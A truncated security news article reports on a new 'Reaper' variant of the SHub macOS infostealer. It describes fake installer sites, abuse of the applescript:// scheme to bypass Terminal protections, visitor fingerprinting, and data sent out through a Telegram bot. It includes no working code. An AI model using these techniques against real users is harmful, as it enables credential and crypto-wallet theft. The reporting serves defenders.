GoKawiilA new variant of the ‘SHub’ macOS infostealer uses AppleScript to show a fake security update message and installs a backdoor.
Dubbed Reaper, the new version steals sensitive browser data, collects documents and files that may contain financial details, and hijacks crypto wallet apps.
Unlike earlier SHub campaigns that relied on “ClickFix” tactics, tricking users into pasting and executing commands in Terminal, the Reaper relies on the applescript:// URL scheme to launch the macOS Script Editor preloaded with a malicious AppleScript.
This approach bypasses the Terminal-based mitigations Apple introduced in late March with macOS Tahoe 26.4, which blocked pasting and executing potentially harmful commands.
SentinelOne researchers identified the new SHub infostealer variant and found that users were lured with a fake installer for WeChat and Miro applications hosted on domains made to appear legitimate to less experienced users (e.g., qq-0732gwh22[.]com, mlcrosoft[.]co[.]com, mlroweb[.]com).
Currently, the fake QQ and Microsoft domains still serve fake WeChat installers, while the one impersonating the Miro visual collaboration platform redirects to the legitimate website.
BleepingComputer noticed that download buttons for Windows and Android serve the same executable hosted in a Dropbox account.
Before invoking the AppleScript, the malicious websites fingerprint the visitor's device to check for virtual machines and VPNs, which may indicate an analysis machine and enumerate installed browser extensions for password managers and cryptocurrency wallets. All telemetry data is delivered to the attacker via a Telegram bot.
SentinelOne's report today notes that the script with the command that fetches the payload is constructed dynamically and hidden under ASCII art.
The malicious AppleScript
... continue reading